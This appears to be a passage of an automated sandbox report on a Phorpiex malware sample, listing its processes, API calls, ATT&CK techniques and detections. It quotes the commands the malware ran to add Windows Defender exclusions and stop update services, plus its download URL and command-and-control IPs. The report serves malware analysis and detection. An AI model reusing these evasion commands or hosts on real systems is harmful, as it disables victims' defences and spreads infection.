                              Source: C:\Users\user\AppData\Local\Temp\33080.scrAPI call chain: ExitProcess graph end nodegraph_1-4464
                              Source: C:\Windows\sysppvrdnvs.exeAPI call chain: ExitProcess graph end nodegraph_17-4495
                              Source: C:\Windows\sysppvrdnvs.exeAPI call chain: ExitProcess graph end nodegraph_17-4464
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeCode function: 0_2_004B1DE8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_004B1DE8
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeCode function: 0_2_004B10B0 Sleep,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,mbstowcs,mbstowcs,wsprintfW,wsprintfW,PathFileExistsW,mbstowcs,mbstowcs,rand,wsprintfW,mbstowcs,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_004B10B0
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_0040A890 GetProcessHeaps,1_2_0040A890
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeCode function: 0_2_004B1DE8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_004B1DE8

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Adds a directory exclusion to Windows Defender
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeProcess created: C:\Users\user\AppData\Local\Temp\33080.scr "C:\Users\user\AppData\Local\Temp\33080.scr" /SJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /waitJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauservJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /waitJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: GetLocaleInfoA,strcmp,1_2_0040F1B0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: GetLocaleInfoA,strcmp,2_2_0040F1B0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: GetLocaleInfoA,strcmp,17_2_0040F1B0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeCode function: 0_2_004B1D18 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004B1D18

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Changes security center settings (notifications, updates, antivirus, firewall)
                              Source: C:\Windows\sysppvrdnvs.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverrideJump to behavior
                              Stops critical windows services
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait

                              Remote Access Functionality

                              barindex
                              Yara detected Phorpiex
                              Source: Yara matchFile source: 18.0.818921588.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.33080.scr.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.0.33080.scr.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 18.2.818921588.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 33080.scr PID: 7112, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 3060, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 4628, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 818921588.exe PID: 1516, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\sysppvrdnvs.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\33080.scr, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\818921588.exe, type: DROPPED
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,1_2_00401470
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,1_2_00402020
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,1_2_0040E190
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_004013B0 CreateEventA,socket,bind,CreateThread,1_2_004013B0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,2_2_00401470
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,2_2_00402020
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,2_2_0040E190
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_004013B0 CreateEventA,socket,bind,CreateThread,2_2_004013B0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,17_2_00401470
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,17_2_00402020
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,17_2_0040E190
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004013B0 CreateEventA,socket,bind,CreateThread,17_2_004013B0

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                              Windows Management Instrumentation                              		1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		3
                              Disable or Modify Tools                              		11
                              Input Capture                              		1
                              System Time Discovery                              		Remote Services1
                              Archive Collected Data                              		32
                              Ingress Tool Transfer                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts12
                              Native API                              		11
                              Windows Service                              		11
                              Windows Service                              		1
                              Obfuscated Files or Information                              		LSASS Memory1
                              System Network Connections Discovery                              		Remote Desktop Protocol11
                              Input Capture                              		2
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts2
                              Command and Scripting Interpreter                              		1
                              Registry Run Keys / Startup Folder                              		11
                              Process Injection                              		1
                              DLL Side-Loading                              		Security Account Manager2
                              File and Directory Discovery                              		SMB/Windows Admin Shares3
                              Clipboard Data                              		1
                              Non-Standard Port                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts1
                              Service Execution                              		Login Hook1
                              Registry Run Keys / Startup Folder                              		221
                              Masquerading                              		NTDS44
                              System Information Discovery                              		Distributed Component Object ModelInput Capture1
                              Non-Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
                              Virtualization/Sandbox Evasion                              		LSA Secrets241
                              Security Software Discovery                              		SSHKeylogging21
                              Application Layer Protocol                              		Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                              Process Injection                              		Cached Domain Credentials1
                              Process Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              Hidden Files and Directories                              		DCSync31
                              Virtualization/Sandbox Evasion                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                              Application Window Discovery                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1543742 Sample: Bjl3geiFEK.exe Startdate: 28/10/2024 Architecture: WINDOWS Score: 100 70 Suricata IDS alerts for network traffic 2->70 72 Found malware configuration 2->72 74 Antivirus detection for dropped file 2->74 76 6 other signatures 2->76 10 Bjl3geiFEK.exe 15 2->10         started        15 sysppvrdnvs.exe 2->15         started        process3 dnsIp4 66 185.215.113.66, 49730, 49731, 49734 WHOLESALECONNECTIONSNL Portugal 10->66 56 C:\Users\user\AppData\Local\Temp\33080.scr, PE32 10->56 dropped 58 C:\Users\user\AppData\Local\...\tdrpl[1].exe, PE32 10->58 dropped 104 Drops PE files with a suspicious file extension 10->104 17 33080.scr 1 1 10->17         started        file5 signatures6 process7 file8 48 C:\Windows\sysppvrdnvs.exe, PE32 17->48 dropped 78 Antivirus detection for dropped file 17->78 80 Multi AV Scanner detection for dropped file 17->80 82 Found evasive API chain (may stop execution after checking mutex) 17->82 84 5 other signatures 17->84 21 sysppvrdnvs.exe 10 22 17->21         started        signatures9 process10 dnsIp11 60 5.239.153.192, 40500 TCIIR Iran (ISLAMIC Republic Of) 21->60 62 5.75.95.114, 40500 TCIIR Iran (ISLAMIC Republic Of) 21->62 64 4 other IPs or domains 21->64 50 C:\Users\user\AppData\Local\...\818921588.exe, PE32 21->50 dropped 52 C:\Users\user\AppData\Local\...\264162301.exe, data 21->52 dropped 54 C:\Users\user\AppData\Local\...\229472814.exe, data 21->54 dropped 86 Antivirus detection for dropped file 21->86 88 Multi AV Scanner detection for dropped file 21->88 90 Found evasive API chain (may stop execution after checking mutex) 21->90 92 6 other signatures 21->92 26 cmd.exe 1 21->26         started        29 818921588.exe 21->29         started        31 cmd.exe 1 21->31         started        file12 signatures13 process14 signatures15 94 Adds a directory exclusion to Windows Defender 26->94 96 Stops critical windows services 26->96 33 powershell.exe 23 26->33         started        36 conhost.exe 26->36         started        98 Antivirus detection for dropped file 29->98 100 Multi AV Scanner detection for dropped file 29->100 102 Machine Learning detection for dropped file 29->102 38 conhost.exe 31->38         started        40 sc.exe 1 31->40         started        42 sc.exe 1 31->42         started        44 3 other processes 31->44 process16 signatures17 68 Loading BitLocker PowerShell Module 33->68 46 WmiPrvSE.exe 33->46         started        process18

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              Bjl3geiFEK.exe11%ReversingLabsWin32.Downloader.Mint

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe100%AviraHEUR/AGEN.1315882
                              C:\Windows\sysppvrdnvs.exe100%AviraHEUR/AGEN.1315882
                              C:\Users\user\AppData\Local\Temp\33080.scr100%AviraHEUR/AGEN.1315882
                              C:\Users\user\AppData\Local\Temp\818921588.exe100%AviraHEUR/AGEN.1315882
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe100%Joe Sandbox ML
                              C:\Windows\sysppvrdnvs.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\33080.scr100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\818921588.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe82%ReversingLabsWin32.Trojan.MintZard
                              C:\Users\user\AppData\Local\Temp\33080.scr82%ReversingLabsWin32.Trojan.MintZard
                              C:\Users\user\AppData\Local\Temp\818921588.exe82%ReversingLabsWin32.Trojan.MintZard
                              C:\Windows\sysppvrdnvs.exe82%ReversingLabsWin32.Trojan.MintZard

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                              http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              bg.microsoft.map.fastly.net
                              		199.232.214.172
                              		truefalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://185.215.113.66/tdrpl.exetrue
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://schemas.xmlsoap.org/soap/encoding/818921588.exe.2.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s33080.scr, 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 33080.scr, 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, 33080.scr, 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 818921588.exe, 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 818921588.exe, 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, tdrpl[1].exe.0.dr, sysppvrdnvs.exe.1.dr, 33080.scr.0.dr, 818921588.exe.2.drfalse
                                    		unknown
                                    http://91.202.233.141/dwntblansysppvrdnvs.exe, 00000002.00000002.2003480961.000000000064A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://185.215.113.66/tdrpl.exeb1EBjl3geiFEK.exe, 00000000.00000002.1807520857.000000000135B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://91.202.233.141/33080.scr, 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 33080.scr, 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, 33080.scr, 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 818921588.exe, 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 818921588.exe, 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, tdrpl[1].exe.0.dr, 